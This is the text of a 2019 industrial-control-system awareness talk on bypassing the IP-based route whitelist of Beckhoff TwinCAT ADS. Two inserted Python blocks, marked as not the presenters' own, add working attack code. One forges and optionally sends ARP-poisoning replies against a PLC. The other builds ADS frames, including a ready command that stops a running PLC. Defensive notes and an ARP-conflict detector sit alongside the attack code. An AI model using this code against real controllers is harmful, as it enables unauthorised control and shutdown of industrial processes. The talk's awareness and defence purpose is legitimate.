Page 72: IC4 Awareness Session › pdf › 3_20191015-ICS-Awareness.pdf · • DistributedControlSystems(DCS), • ProcessControlSystems(PCS), ... Lessons learned will be demonstrated on:

77

Oktober 15th, 2019

Beckhoff Basics

• Beckhoff uses Windows operating systems on their controllers
• Engineers use Microsoft Visual Studio as the default programming environment
• The only thing engineers have to do to start programming controllers is install the TwinCAT 3 eXtended Automation Engineering software
  • Free to download
  • www.beckhoff.com/twincat3
  • Latest version: 3.1.4024.0 (build date 2019-07-24)
• IEC 61131-3 standard: Ladder, Function Block Diagram, Structured Text, …


Protocol Communication

• TwinCAT AMS/ADS protocol
  • AMS (Automation Message Specification): the routing envelope
    • AMS Address (NetId): IP address + ".1.1" by default (e.g. 10.0.0.35.1.1)
    • AMS Port: depends on the function
  • Data: ADS (Automation Device Specification)
    • Commands for the PLC (more later)


Routes

• Combination of AMS Address & IP address
• Acts like a whitelist: only known routes can communicate
• Add routes with Windows credentials


Device Discovery

Just like almost every industrial vendor, Beckhoff devices respond to certain discovery packets. This is a different protocol altogether (routes do not exist yet at this point), so information disclosure is guaranteed …

→ UDP/48899

Adding Routes Remotely?

→ Is also done via AMS-over-UDP
→ Adding a route requires (any) local Windows credential, which can be sent in clear text or encrypted


Secure?

So as it turns out: the only security measure for ADS communication is the IP address that is in the list of routes …
→ So can we bypass a restriction that is based purely on the source IP address?

Solution: IP Spoofing

By sending packets that appear to come from different IP addresses we can "discover" the routes that are present.

Done in two parts:
1. ARP poison
2. ADS verification packet


1. ARP Poisoning?

Problem: if we trigger a response while pretending to come from a certain IP address, the target sends that response to the device that really owns the address (it resolves the MAC address with an ARP request for that IP).

So we need to tell the target our MAC address for that specific IP address.
→ This is called "ARP spoofing"


2. Sending a single ADS packet

This packet, too, has to be "spoofed": it is sent with the fake IP address (a candidate route address) as its source.
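The first part of the procedure above (the forged ARP reply that makes the target associate a whitelisted route's IP address with our MAC), together with the mirror-image check a defender can run on the same traffic, as an added example in Python. This is not the authors' script from their GitHub; the MAC and IP addresses are constructed (00:01:05 is Beckhoff's OUI, the rest is made up), and only the ARP step is shown: the spoofed-source ADS packet of step 2 needs a raw TCP session and is not covered here.

```python
"""Forged ARP reply for route spoofing, plus the defender-side conflict check.

Added example, not the presenters' scripts. Frame layout is Ethernet II with
EtherType 0x0806 and an RFC 826 ARP body; all addresses below are constructed.
"""
import socket
import struct
from collections import defaultdict

ETHERTYPE_ARP = 0x0806
HTYPE_ETHERNET, PTYPE_IPV4 = 1, 0x0800
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_to_bytes(mac: str) -> bytes:
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(spoofed_ip: str, our_mac: str, target_ip: str, target_mac: str) -> bytes:
    """Unicast 'spoofed_ip is at our_mac' reply to the target (14-byte Ethernet + 28-byte ARP)."""
    ether = mac_to_bytes(target_mac) + mac_to_bytes(our_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, ARP_REPLY)
           + mac_to_bytes(our_mac) + socket.inet_aton(spoofed_ip)     # sender: the identity we claim
           + mac_to_bytes(target_mac) + socket.inet_aton(target_ip))  # target: the device we poison
    return ether + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame; rejects anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return {"op": op, "sender_mac": bytes_to_mac(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": bytes_to_mac(tha), "target_ip": socket.inet_ntoa(tpa)}


def find_arp_conflicts(frames) -> dict:
    """Defender's view of the same traffic: IPs that more than one MAC has claimed."""
    claims = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        claims[arp["sender_ip"]].add(arp["sender_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


if __name__ == "__main__":
    import sys
    # Constructed lab: PLC 10.0.0.35 (Beckhoff OUI), whitelisted engineering PC 10.0.0.100,
    # attacker MAC de:ad:be:ef:00:01 claiming the engineering PC's IP.
    poison = build_arp_reply("10.0.0.100", "de:ad:be:ef:00:01", "10.0.0.35", "00:01:05:aa:bb:cc")
    print(poison.hex())
    if len(sys.argv) > 2 and sys.argv[1] == "--send":   # --send eth0 : Linux, root, lab network only
        with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as raw:
            raw.bind((sys.argv[2], 0))
            raw.send(poison)
```

Targets also refresh their ARP cache from requests, so in practice the reply is resent every few seconds for as long as the spoofed session must stay alive. find_arp_conflicts is the same mapping seen from the other side: one IP claimed by two MACs within a short window is exactly the signature a network monitor on the control network should alert on.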


DEMO


Beckhoff Spoofing

• Added a route WITHOUT authentication

• We are now essentially a different ADS device: an IPC, an engineering PC, an HMI …

• TwinCAT ADS exposes a set of commands, also wrapped in PLC function blocks, to perform actions on devices.

• Examples of those actions are
  • Reading/writing PLC variables
  • Setting the controller state to Stop, Run or Config mode
  • Downloading the internal PLC project
  • (Re)programming the internal PLC project
  • And adding routes without any additional authentication
  • … And as it turns out: a lot more …
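The AMS/ADS framing from the Protocol Communication slide and two of the actions listed above (reading the controller state and setting it to Stop), as an added example in Python. It is not the authors' GitHub script and it does not touch the network. The byte layout follows Beckhoff's published ADS/AMS specification; the NetIds, the client port and the use of AMS port 851 (first TwinCAT 3 PLC runtime) are assumptions for illustration. The frame makes the slide's point visible: the AMS header carries addresses, a command id and an invoke id, but no credential of any kind, so once our IP is on the route list a WriteControl to state 6 is all it takes to stop the PLC.

```python
"""AMS/TCP framing for TwinCAT ADS: ReadState and WriteControl requests.

Added example (not the presenters' GitHub scripts). Byte layout follows the
public Beckhoff ADS/AMS specification; NetIds and the client port are
constructed, and 851 is assumed to be the first TwinCAT 3 PLC runtime.
"""
import struct

AMS_TCP_PORT = 48898                 # AMS router over TCP (UDP/48899 is discovery)
AMS_HEADER_FMT = "<6sH6sHHHIII"      # little-endian, 32 bytes, see build_ams_frame()
AMS_HEADER_LEN = struct.calcsize(AMS_HEADER_FMT)

ADS_READ_STATE = 4                   # ADS command ids used here
ADS_WRITE_CONTROL = 5
AMS_REQUEST = 0x0004                 # AMS state flags: ADS command request ...
AMS_RESPONSE = 0x0005                # ... and its response

ADSSTATE = {0: "INVALID", 1: "IDLE", 2: "RESET", 3: "INIT", 4: "START",
            5: "RUN", 6: "STOP", 15: "CONFIG", 16: "RECONFIG"}
PLC_RUNTIME_PORT = 851               # assumed: TwinCAT 3 PLC runtime, first instance
CLIENT_PORT = 32905                  # constructed: source AMS port of our client


def netid_to_bytes(netid: str) -> bytes:
    """'10.0.0.35.1.1' -> 0a 00 00 23 01 01 (the default NetId is the IP + '.1.1')."""
    parts = netid.split(".")
    if len(parts) != 6 or not all(p.isdigit() and int(p) <= 255 for p in parts):
        raise ValueError(f"not a valid AMS NetId: {netid!r}")
    return bytes(int(p) for p in parts)


def bytes_to_netid(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_ams_frame(target, target_port, source, source_port, command,
                    data=b"", invoke_id=1, flags=AMS_REQUEST) -> bytes:
    """6-byte AMS/TCP header + 32-byte AMS header + ADS payload.

    AMS header: target NetId/port, source NetId/port, command id, state flags,
    data length, error code, invoke id. There is no authentication field.
    """
    ams = struct.pack(AMS_HEADER_FMT, netid_to_bytes(target), target_port,
                      netid_to_bytes(source), source_port, command, flags,
                      len(data), 0, invoke_id)
    # AMS/TCP header: 2 reserved bytes, then length of AMS header + data
    return struct.pack("<HI", 0, len(ams) + len(data)) + ams + data


def parse_ams_frame(frame: bytes) -> dict:
    """Split a frame back into header fields and payload, checking both length fields."""
    if len(frame) < 6 + AMS_HEADER_LEN:
        raise ValueError("frame too short for AMS/TCP + AMS header")
    _reserved, tcp_len = struct.unpack_from("<HI", frame, 0)
    if tcp_len != len(frame) - 6:
        raise ValueError("AMS/TCP length field does not match frame size")
    (tgt, tgt_port, src, src_port, command, flags,
     data_len, error, invoke_id) = struct.unpack_from(AMS_HEADER_FMT, frame, 6)
    data = frame[6 + AMS_HEADER_LEN:]
    if data_len != len(data):
        raise ValueError("AMS data length field does not match payload")
    return {"target": bytes_to_netid(tgt), "target_port": tgt_port,
            "source": bytes_to_netid(src), "source_port": src_port,
            "command": command, "flags": flags, "error": error,
            "invoke_id": invoke_id, "data": data}


def read_state_request(plc: str, client: str) -> bytes:
    """ADS ReadState (command 4) has an empty payload."""
    return build_ams_frame(plc, PLC_RUNTIME_PORT, client, CLIENT_PORT, ADS_READ_STATE)


def write_control_request(plc: str, client: str, ads_state: int) -> bytes:
    """ADS WriteControl (command 5): new ADS state, device state, extra-data length, data."""
    payload = struct.pack("<HHI", ads_state, 0, 0)
    return build_ams_frame(plc, PLC_RUNTIME_PORT, client, CLIENT_PORT,
                           ADS_WRITE_CONTROL, payload, invoke_id=2)


def build_read_state_response(plc: str, client: str, ads_state: int, invoke_id=1) -> bytes:
    """What the router sends back: result (u32), ADS state (u16), device state (u16)."""
    payload = struct.pack("<IHH", 0, ads_state, 0)
    return build_ams_frame(client, CLIENT_PORT, plc, PLC_RUNTIME_PORT,
                           ADS_READ_STATE, payload, invoke_id, AMS_RESPONSE)


def parse_read_state_response(frame: bytes) -> str:
    """Return the ADS state name from a ReadState response, or raise on an ADS error."""
    hdr = parse_ams_frame(frame)
    if hdr["command"] != ADS_READ_STATE or hdr["flags"] != AMS_RESPONSE:
        raise ValueError("not a ReadState response")
    result, ads_state, _device_state = struct.unpack("<IHH", hdr["data"])
    if hdr["error"] or result:
        raise ValueError(f"ADS error 0x{(hdr['error'] or result):x}")
    return ADSSTATE.get(ads_state, f"UNKNOWN({ads_state})")


if __name__ == "__main__":
    plc, client = "10.0.0.35.1.1", "10.0.0.100.1.1"        # constructed addresses
    print("ReadState   :", read_state_request(plc, client).hex())
    print("Stop PLC    :", write_control_request(plc, client, 6).hex())
    # Constructed reply as a running PLC would answer (state 5 = RUN).
    print("Parsed reply:", parse_read_state_response(build_read_state_response(plc, client, 5)))
```

Putting these on the wire is a plain socket.sendall() of the bytes to TCP/48898 on the controller's IP; the router answers with the same invoke id, which is how responses are matched to requests, and with AMS error 0x7 (target port not found) when the PLC runtime is not on the assumed port.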


More ADS actions? There is a website for that:
https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=


Want to go further? There is a website for that:
https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=


A little bonus

We can use this to bypass a Kiosk System too

DEMO


Conclusion: Remote Code Execution vulnerability

The prerequisites for this attack:
• An engineering system (e.g. a laptop) used to program a Beckhoff device (IPC/HMI/…)
• Has the TwinCAT Runtime installed
  • Which is a requirement when programming with Beckhoff
• Ports open in the firewall (UDP/48899 or TCP/48898)
  • Open by default and necessary to add remote routes
    → To add a route from an IPC to a workstation, the ports above must be open!! (for some reason)
  • No longer necessary once the remote routes are added
• At least one route configured
  • Which is required to communicate with remote devices

Scripts on our Github


Are there solutions?

• Use a virtual machine for running TwinCAT

• Configure Windows Firewalls

• And the official response from the Beckhoff Product-Security CERT:

“Please refer to Advisory 2017-001”


Official Solution


Want to know more? Join our project

Innovative Network Monitoring Systems

Cyber Security Solutions for Industry 4.0

Regulations within the industrial sector

Or find us at our booth (and join the ICS CTF) ☺


Want to know more?
• There is a 5-day course (5 weeks, 1 day/week) scheduled, starting November 14th
• Visit www.ic4.be for more information and free newsletter subscriptions
• Also follow our blog (www.ic4.be/blog) and vulnerability checklist (checklist.ic4.be)